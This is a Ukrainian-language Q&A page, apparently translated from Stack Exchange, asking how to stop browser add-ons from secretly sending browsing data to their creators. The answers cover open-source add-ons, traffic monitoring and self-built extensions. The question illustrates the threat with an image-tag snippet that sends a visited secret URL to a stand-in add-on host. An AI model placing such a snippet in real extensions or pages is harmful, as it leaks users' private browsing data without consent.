Запобігання додаткам у веб-переглядачі "телефонувати додому"

0

В принципі, будь-який додаток до браузера може шпигувати за мною, збираючи історію браузера, веб-пошту чи інші конфіденційні дані. AFAIKS, він може відправити ці дані назад своєму творцеві , використовуючи або XMLHttpRequest()або fetch()або шляхом маніпулювання DOM, наприклад , додаючи що - щось на зразок

<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>

запуск HTTP-запиту на сторінку розробника додатка з можливістю надсилання будь-яких даних, які йому подобаються. Однак не всі додатки повинні робити HTTP-запити або маніпулювати DOM.

Звідси питання:

Чи існує якесь існуюче рішення для деяких браузерів, яке обмежує функціональність JavaScript, доступного додатку - зокрема, для DOM-маніпулювання та HTTP-запитів?

browser-addons  spyware 
Томас В.
джерело

Відповіді:

2

Я не впевнений, але це залежатиме від вашого браузера. Ви можете використовувати лише плагіни з відкритим кодом, які дозволять вам перевірити, чи вони телефонують додому. Крім того, ви можете використовувати щось на зразок Wireshark, щоб шукати будь-які запити, надіслані браузерним процесом в IP, відмінний від веб-сайту, який ви відвідуєте. Крім того, якщо ви використовуєте Firefox, є багато телефонів додому до Mozilla, якщо ви не відключите телеметрію, і я вважаю, що інший варіант про: config. Я забуваю інший варіант, але ви можете його знайти тут . Я не впевнений у тому, як зупинити плагін від дозвону додому, я думаю, ви могли б спробувати створити Firefox на замовлення та якось змінити спосіб запуску плагінів, щоб вони не надсилали веб-запити. Це зробило б більшість плагінів марними, оскільки їм часто доводиться надсилати веб-запити на роботу.

Щоб переконатися, що аддон з відкритим кодом не був підроблений, ви можете скласти його самостійно. Цей підручник показує, як встановити jpm, який може компілювати розширення Firefox. Після встановлення jpm запустіть:

jpm xpi

у вихідному каталозі плагінів для створення файлу розширення xpi. Потім відкрийте xpi, який повинен його встановити. Це, ймовірно, скаже вам, що це не довірено, тому що він був складений, а не підписаний або на веб-сайті додатка Mozilla. Це повинно працювати для більшості розширень, якщо вони не дуже старі.

медузи
джерело
Хороша відповідь. Для мене рішення - використовувати лише плагіни з відкритим кодом (а також браузер з відкритим кодом) і переконайтесь, що двійкові файли не підроблені.
Марк.2377
Спочатку в моєму запитанні був ще один розділ із запитанням, як переконатися, що надбудова з відкритим кодом не була підроблена - я думаю, що додам це ще назад.
Томас В.
Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.